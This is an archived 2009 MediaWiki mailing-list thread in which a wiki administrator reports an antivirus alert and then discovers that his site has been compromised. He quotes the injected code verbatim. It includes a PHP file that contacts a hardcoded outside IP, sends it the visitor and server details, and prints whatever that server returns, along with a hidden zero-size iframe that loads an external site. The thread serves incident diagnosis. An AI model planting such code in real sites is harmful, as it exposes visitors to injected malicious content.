I notice several files that seem to have modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php $ip = '209.62.27.83'; $port = '80'; $path = '/linkr/get/'; $fp = fsockopen($ip, $port, $errno, $errstr, 30); if (!$fp) { echo ''; } else { $post = "u = ".rawurlencode ($ _SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']); $out = "POST ".$path." HTTP/1.0\r\n"; $out .= "Host: ".$ip.":".$port."\r\n"; $out .= "Content-Type: text/html\r\n"; $out .= "Content-Length: ".strlen($post)."\r\n"; $out .= "Connection: Close\r\n"; $out .= "\r\n"; $out .= $post; fwrite($fp, $out); $resp = ''; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); $paths = split("\r\n\r\n", $resp); echo $paths[1]; } ?>
and this "m-analytics" code was added to an old index page and a google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m- analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
.........................................................Tim Ware......................................................... HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607 t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com .. twitter.com/hyperarts http://www.hyperarts.com Map
On Jun 22, 2009, at 12:05 PM, Mark (Markie) wrote:
You seem to also have external content running on there such as m- analytics and addthis, try removing them and asking them to check again. If it still happens then you can confirm a MediaWiki problem, but I suspect it may be the analytics or similar triggering this as its the only content loading in an iframe and this is what the error seems to suggest.
Regards
Mark
On Mon, Jun 22, 2009 at 7:59 PM, Tim Ware tim@hyperarts.com wrote:
I got an email from someone accessing my wiki:
http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
I'm using v 1.9.3
Here's the message I received:
I get a message from Avast anti-virus that the page is infected with : HTML:Iframe-inf. I have contacted Avast who says this is not a false positive. You can Google virus name--it seems that this infection is fairly common. Please let me know if the infection is real--I would like to use the wiki.
Any idea of what I should do to address this?
Thanks! Tim
.........................................................Tim Ware......................................................... HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607 t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com .. twitter.com/hyperarts http://www.hyperarts.com Map
MediaWiki-l mailing list MediaWiki-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
MediaWiki-l mailing list MediaWiki-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l